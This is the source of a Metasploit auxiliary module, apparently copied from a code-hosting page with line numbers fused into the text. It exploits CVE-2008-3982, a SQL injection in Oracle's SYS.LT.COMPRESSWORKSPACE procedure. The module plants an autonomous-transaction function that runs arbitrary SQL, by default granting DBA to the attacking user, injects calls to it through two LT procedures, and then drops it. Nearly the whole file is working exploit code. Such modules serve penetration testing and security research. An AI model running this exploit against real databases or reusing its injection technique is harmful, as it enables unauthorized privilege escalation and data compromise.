Path: blob/master/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb
19721 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::ORACLE78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE',13'Description' => %q{14This module exploits an sql injection flaw in the COMPRESSWORKSPACE15procedure of the PL/SQL package SYS.LT. Any user with execute16privilege on the vulnerable package can exploit this vulnerability.17},18'Author' => [ 'CG' ],19'License' => MSF_LICENSE,20'References' => [21[ 'CVE', '2008-3982'],22[ 'OSVDB', '49324'],23[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]24],25'DisclosureDate' => '2008-10-13',26'Notes' => {27'Stability' => [CRASH_SAFE],28'SideEffects' => [IOC_IN_LOGS],29'Reliability' => []30}31)32)3334register_options(35[36OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),37]38)39end4041def run42return if !check_dependencies4344name = Rex::Text.rand_text_alpha_upper(1..10)45cruft = Rex::Text.rand_text_alpha_upper(1)4647function = "48CREATE OR REPLACE FUNCTION #{cruft}49RETURN VARCHAR2 AUTHID CURRENT_USER50AS51PRAGMA AUTONOMOUS_TRANSACTION;52BEGIN53EXECUTE IMMEDIATE '#{datastore['SQL']}';54COMMIT;55RETURN '#{cruft}';56END;"5758package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"5960package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"6162clean = "DROP FUNCTION #{cruft}"6364print_status('Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...')6566print_status('Sending function...')67prepare_exec(function)6869begin70prepare_exec(package1)71prepare_exec(package2)72rescue StandardError => e73if (e.to_s =~ /No Data/)74print_status("Removing function '#{cruft}'...")75prepare_exec(clean)76else77return78end79end80end81end828384